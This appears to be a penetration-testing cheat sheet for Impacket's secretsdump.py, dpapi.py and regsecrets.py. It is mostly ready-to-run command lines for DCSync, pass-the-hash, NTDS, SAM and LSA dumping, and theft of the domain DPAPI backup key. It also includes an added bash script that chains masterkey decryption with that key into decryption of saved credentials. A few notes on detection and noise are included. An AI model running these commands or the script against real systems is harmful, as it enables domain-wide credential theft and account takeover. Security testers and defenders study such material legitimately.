Impacket: Credential Dumping
Quick Reference
| Tool | Purpose |
|---|---|
| secretsdump.py | Dump SAM, LSA secrets, cached creds and NTDS.DIT (DRSUAPI/DCSync, VSS or remote shadow copy) |
| dpapi.py | Decrypt DPAPI-protected secrets (masterkeys, credential files, vaults, raw blobs) |
| regsecrets.py | Dump SAM, LSA secrets and MSCache remotely over the registry, with no VSS and no DRSUAPI |
secretsdump.py
Dump secrets from a remote host or parse hive files offline (LOCAL). The default remote paths need no agent on the target: SAM/LSA/cached creds are pulled through the remote registry and NTDS through DRSUAPI (DCSync). The VSS and remote-shadow-copy methods do execute commands on the target.
Syntax:
secretsdump.py [options] <domain>/<username>:<password>@<target>
# or LOCAL for offline parsing:
secretsdump.py -sam <sam> -system <system> -security <security> LOCAL
Common Usage:
# Remote live dump - SAM + LSA secrets + cached creds (password auth); against a DC it continues with NTDS via DRSUAPI
secretsdump.py <domain>/<username>:<password>@<target>
# Pass-the-Hash (the LM half may be left empty: -hashes :<nt-hash>)
secretsdump.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>
# Kerberos (ccache) - the target must be the host's FQDN, not an IP, so the SPN in the ticket matches
KRB5CCNAME=<ticket.ccache> secretsdump.py -k -no-pass <domain>/<username>@<target-fqdn>
# AES key (Kerberos, no ticket file needed)
secretsdump.py -aesKey <aes256-key> -k -no-pass <domain>/<username>@<target-fqdn>
# DCSync - dump NTDS from a DC over DRSUAPI (NTLM hashes + Kerberos keys)
secretsdump.py -just-dc <domain>/<username>:<password>@<dc-ip>
# DCSync - NTLM hashes only
secretsdump.py -just-dc-ntlm <domain>/<username>:<password>@<dc-ip>
# DCSync - single account
secretsdump.py -just-dc-user <target-user> <domain>/<username>:<password>@<dc-ip>
# DCSync with password history
secretsdump.py -just-dc -history <domain>/<username>:<password>@<dc-ip>
# DCSync - append pwdLastSet and enabled/disabled status to each account
secretsdump.py -just-dc -pwd-last-set -user-status <domain>/<username>:<password>@<dc-ip>
# Save all output to files (depending on what was dumped: <output>.ntds, <output>.ntds.kerberos, <output>.ntds.cleartext, <output>.sam, <output>.secrets, <output>.cached)
secretsdump.py -just-dc -outputfile <output> <domain>/<username>:<password>@<dc-ip>
# VSS method - shadow copy of NTDS.DIT on the DC (runs commands on the target)
secretsdump.py -use-vss <domain>/<username>:<password>@<dc-ip>
# VSS with a specific exec method
secretsdump.py -use-vss -exec-method wmiexec <domain>/<username>:<password>@<dc-ip>
# Remote shadow snapshot via WMI (SAM/SYSTEM/SECURITY)
secretsdump.py -use-remoteSSWMI <domain>/<username>:<password>@<target>
# Remote shadow snapshot including NTDS (DC)
secretsdump.py -use-remoteSSWMI -use-remoteSSWMI-NTDS <domain>/<username>:<password>@<dc-ip>
# Parse local SAM + SYSTEM (offline)
secretsdump.py -sam SAM -system SYSTEM LOCAL
# Parse local SAM + SYSTEM + SECURITY (offline)
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
# Parse NTDS.DIT offline (the SYSTEM hive from the same DC supplies the bootkey)
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
# Parse NTDS.DIT offline - NTLM only
secretsdump.py -ntds ntds.dit -system SYSTEM -just-dc-ntlm LOCAL
# Skip SAM, only LSA
secretsdump.py -skip-sam <domain>/<username>:<password>@<target>
# Resume interrupted NTDS dump
secretsdump.py -resumefile resume.bin -just-dc <domain>/<username>:<password>@<dc-ip>
# LDAP filter (dump specific users)
secretsdump.py -ldapfilter '(memberOf=CN=Domain Admins,CN=Users,DC=<domain>,DC=local)' \
<domain>/<username>:<password>@<dc-ip>
Options:
- -hashes <lm-hash>:<nt-hash> - NTLM hash auth (LM half may be empty: -hashes :<nt-hash>)
- -k / -no-pass - Kerberos via ccache (KRB5CCNAME)
- -aesKey <aes256-key> - AES Kerberos key (128 or 256 bit)
- -dc-ip <dc-ip> - DC IP for Kerberos/LDAP when DNS does not resolve the domain
- -target-ip <target> - Target IP override (pair with a hostname target when DNS is not usable)
- -just-dc - NTDS only (NTLM hashes + Kerberos keys)
- -just-dc-ntlm - NTDS only (NTLM hashes, no Kerberos keys)
- -just-dc-user <target-user> - NTDS for a single account
- -ldapfilter <filter> - NTDS restricted to accounts matching an LDAP filter
- -history - Include password history and LSA OldVal
- -pwd-last-set - Show pwdLastSet for each NTDS account
- -user-status - Show enabled/disabled status
- -outputfile <output> - Base filename for output files
- -use-vss - VSS method (instead of the default DRSUAPI)
- -exec-method [{smbexec,wmiexec,mmcexec}] - Exec method for VSS
- -use-remoteSSWMI - Shadow copy via WMI (no agent dropped)
- -use-remoteSSWMI-NTDS - Also dump NTDS when using the WMI shadow copy
- -system <file> - Local SYSTEM hive
- -sam <file> - Local SAM hive
- -security <file> - Local SECURITY hive
- -ntds <file> - Local NTDS.DIT file
- -bootkey <key> - Bootkey as hex, when no SYSTEM hive is available
- -skip-sam / -skip-security - Skip specific hive parsing
- -resumefile <file> - Resume an interrupted NTDS dump
Notes:
- DCSync (-just-dc, the default DRSUAPI method) needs an account holding both replication rights on the domain object: DS-Replication-Get-Changes and DS-Replication-Get-Changes-All. Domain Admins, Enterprise Admins and Administrators have them by default; any other principal granted them can DCSync too.
- DRSUAPI writes nothing to the DC's disk, but each replication request is logged as event 4662 on the DC when directory service access auditing is enabled; a replication request from a non-DC host is the standard DCSync detection.
- The VSS method (-use-vss) creates a shadow copy on the DC through the chosen -exec-method and copies NTDS.DIT and SYSTEM out over SMB: noisier, but it works with local admin on the DC when the replication rights are missing or DRSUAPI is filtered.
- The WMI shadow snapshot (-use-remoteSSWMI) also creates a shadow copy, via WMI instead of an exec-method service; treat it as quieter than VSS, not silent.
- With -k the target must be a hostname or FQDN; if DNS is not usable add -target-ip and -dc-ip.
- The default remote method starts the RemoteRegistry service on the target if it is stopped.
- Flag names for the shadow-copy methods differ between Impacket releases; confirm with secretsdump.py -h before relying on this sheet.
dpapi.py
Decrypt DPAPI-protected secrets offline: Credential Manager entries (credential files), vaults (Web Credentials, Windows Credentials) and raw CryptProtectData blobs such as browser key material, Wi-Fi profile keys and saved RDP credentials.
Syntax:
dpapi.py <action> [options]
Actions:
- backupkeys - Retrieve the domain DPAPI backup key from a DC
- masterkey - Decrypt a DPAPI masterkey file
- credential - Decrypt a DPAPI credential file
- vault - Decrypt a vault policy or vault credential
- unprotect - CryptUnprotectData on a raw blob
- credhist - Parse a CREDHIST file
Common Usage:
# Get the domain DPAPI backup key from a DC (Domain Admin rights; decrypts any domain user's masterkeys)
dpapi.py backupkeys -t <domain>/<username>:<password>@<dc-ip> -export
# Decrypt a masterkey with the domain backup key
dpapi.py masterkey -file <masterkey-file> -pvk domain_backup.pvk
# Decrypt a masterkey with the user's password (the SID is the directory name under Protect\)
dpapi.py masterkey -file <masterkey-file> -sid <sid> -password <password>
# Decrypt a masterkey with the user's NT hash
dpapi.py masterkey -file <masterkey-file> -sid <sid> -hash <nt-hash>
# Decrypt a credential file with a recovered masterkey (pass the key as dpapi.py printed it, 0x-prefixed hex)
dpapi.py credential -file <credential-file> -key 0x<masterkey-hex>
# Vault: decrypt the vault policy with the masterkey to recover the vault keys ...
dpapi.py vault -vpol <vpol-file> -key 0x<masterkey-hex>
# ... then decrypt the vault credential with one of the vault keys it printed
dpapi.py vault -vcrd <vcrd-file> -key 0x<vault-key-hex>
# CryptUnprotectData on a raw blob
dpapi.py unprotect -file <blob-file> -key 0x<masterkey-hex>
Notes:
- The domain backup key decrypts the masterkeys of every domain user, so one read from a DC covers the whole domain; treat the exported .pvk like krbtgt material
- Masterkey files: %APPDATA%\Microsoft\Protect\<SID>\{GUID} (the file name is the masterkey GUID; a credential blob names the GUID it was protected with)
- Credential files: %APPDATA%\Microsoft\Credentials\ and %LOCALAPPDATA%\Microsoft\Credentials\
- Vault files: %LOCALAPPDATA%\Microsoft\Vault\<GUID>\ (Policy.vpol plus one .vcrd per entry)
- Keys are passed to -key as 0x-prefixed hex, exactly as dpapi.py prints them
- System masterkeys (%WINDIR%\System32\Microsoft\Protect\S-1-5-18\ and its User\ subdirectory) are protected by the DPAPI_SYSTEM LSA secret; secretsdump prints it (dpapi_machinekey/dpapi_userkey) with the LSA secrets, and dpapi.py masterkey can take the SYSTEM and SECURITY hives via -system/-security, or the key directly via -key
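The masterkey-then-credential chain above, scripted as an added example (not Impacket's own code): decrypt every masterkey under a user's Protect\<SID> directory with the domain backup key, then try each recovered key against a credential file. It shells out to dpapi.py through the DPAPI variable so the flow can be exercised offline against a stub; the Protect directory layout, the "Decrypted key: 0x" output line and the "Username" field used as the success marker are assumptions about dpapi.py's output.

```shell
#!/usr/bin/env bash
# Added example, not Impacket code: chain dpapi.py masterkey and dpapi.py credential
# over a user's whole Protect\<SID> directory. DPAPI defaults to dpapi.py from PATH;
# set it to a stub to run the flow without a real DPAPI tree.
DPAPI="${DPAPI:-dpapi.py}"

# Decrypt one masterkey file with the backup private key and print "<guid>:<hexkey>".
# dpapi.py reports the result on a "Decrypted key: 0x<hex>" line (assumption about its
# output); nothing is printed when the pvk does not match, e.g. a local account's masterkey.
masterkey_from_pvk() {   # $1 = masterkey file (its name is the masterkey GUID), $2 = backup .pvk
    key=$("$DPAPI" masterkey -file "$1" -pvk "$2" 2>/dev/null </dev/null \
          | sed -n 's/^Decrypted key: 0x\([0-9a-fA-F]*\).*/\1/p' | head -n 1)
    if [ -n "$key" ]; then
        printf '%s:%s\n' "$(basename "$1")" "$key"
    fi
}

# Walk a copy of %APPDATA%\Microsoft\Protect\<SID>\ and decrypt each masterkey file,
# skipping the Preferred marker and the BK-* backup-key blobs stored alongside them.
all_masterkeys() {   # $1 = Protect/<SID> directory, $2 = backup .pvk
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        case "$(basename "$f")" in Preferred|BK-*) continue ;; esac
        masterkey_from_pvk "$f" "$2"
    done
}

# Try every recovered key against one credential file and print the first decrypted
# blob. dpapi.py takes the key as 0x-prefixed hex; a decrypted CREDENTIAL dump carries
# a "Username" field, used here as the success marker (assumption about its format).
decrypt_credential() {   # $1 = credential file, $2 = file of "guid:key" lines
    while IFS=: read -r guid key; do
        out=$("$DPAPI" credential -file "$1" -key "0x$key" 2>/dev/null </dev/null) || continue
        if printf '%s\n' "$out" | grep -q 'Username'; then
            printf 'masterkey %s decrypts %s\n%s\n' "$guid" "$1" "$out"
            return 0
        fi
    done < "$2"
    return 1
}

# Usage: ./dpapi_chain.sh <Protect/SID dir> <backup.pvk> <credential file>...
if [ "$#" -ge 3 ]; then
    dir=$1; pvk=$2; shift 2
    keys=$(mktemp)
    all_masterkeys "$dir" "$pvk" > "$keys"
    for c in "$@"; do
        decrypt_credential "$c" "$keys" || echo "no recovered masterkey decrypts $c"
    done
    rm -f "$keys"
fi
```

Decrypting all masterkeys once and caching the "guid:key" list is the point: credential, vault and unprotect runs then need no further contact with the DC or the user's password.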
regsecrets.py
Remotely dump SAM, MSCache (cached domain credentials) and LSA secrets through the remote registry protocol alone: no shadow copy, no DRSUAPI, no command execution, and it reads the keys it needs directly instead of saving hive copies to the target's disk the way secretsdump's default remote path does. Needs local admin on the target and the RemoteRegistry service reachable over SMB.
Syntax:
regsecrets.py [options] <domain>/<username>:<password>@<target>
Common Usage:
# Full dump (SAM + cache + LSA)
regsecrets.py <domain>/<username>:<password>@<target>
# Pass-the-Hash
regsecrets.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>
# Kerberos (ccache)
KRB5CCNAME=<ticket> regsecrets.py -k -no-pass <domain>/<username>@<target>
# AES key
regsecrets.py -aesKey <aes256-key> -k -no-pass <domain>/<username>@<target>
# SAM only
regsecrets.py -nocache -nolsa <domain>/<username>:<password>@<target>
# LSA secrets only
regsecrets.py -nosam -nocache <domain>/<username>:<password>@<target>
# Save output to file
regsecrets.py -outputfile <output> <domain>/<username>:<password>@<target>
# Include password history
regsecrets.py -history <domain>/<username>:<password>@<target>
# With throttle to reduce noise
regsecrets.py -throttle 2 <domain>/<username>:<password>@<target>
# Provide local SYSTEM hive for bootkey (offline-assisted)
regsecrets.py -system <system-hive> <domain>/<username>:<password>@<target>
Options:
- -hashes <lm-hash>:<nt-hash> - NTLM hash auth
- -k / -no-pass - Kerberos via ccache (KRB5CCNAME; target must be a hostname/FQDN)
- -aesKey <aes256-key> - AES Kerberos key
- -dc-ip <dc-ip> - DC IP
- -target-ip <target> - Target IP override
- -nosam - Skip SAM
- -nocache - Skip MSCache (cached domain credentials)
- -nolsa - Skip LSA secrets
- -history - Dump password history
- -outputfile <output> - Base filename for output
- -throttle <seconds> - Delay between registry operations
- -system <file> - Local SYSTEM hive for the bootkey
- -bootkey <key> - Bootkey as hex
Notes:
- Cached domain credentials come out as DCC2 ($DCC2$10240#user#hash) on Vista and later: slow to crack and not usable for pass-the-hash, so they are offline-cracking material only
- regsecrets.py is newer than secretsdump.py and its flag set has moved between releases; check regsecrets.py -h on your install before relying on the options above